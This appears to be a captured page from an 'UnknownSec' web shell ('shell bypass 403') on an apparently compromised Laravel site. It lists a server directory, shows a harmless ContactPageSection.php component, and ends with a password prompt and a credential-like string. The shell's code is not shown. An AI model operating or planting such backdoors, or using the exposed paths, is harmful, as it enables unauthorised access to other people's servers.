shell bypass 403

UnknownSec Shell

: /home/bouloter/infix/app/View/Components/ [ drwxr-xr-x ]

name : ContactPageSection.php
<?php

namespace App\View\Components;


use Illuminate\View\Component;
use Modules\SystemSetting\Entities\SocialLink;

class ContactPageSection extends Component
{

    public function render()
    {
        $data = [];
        if ((Settings('frontend_active_theme') == "teachery")) {
            $data['social'] = SocialLink::where('status', 1)->get();
        }
        return view(theme('components.contact-page-section'), $data);
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password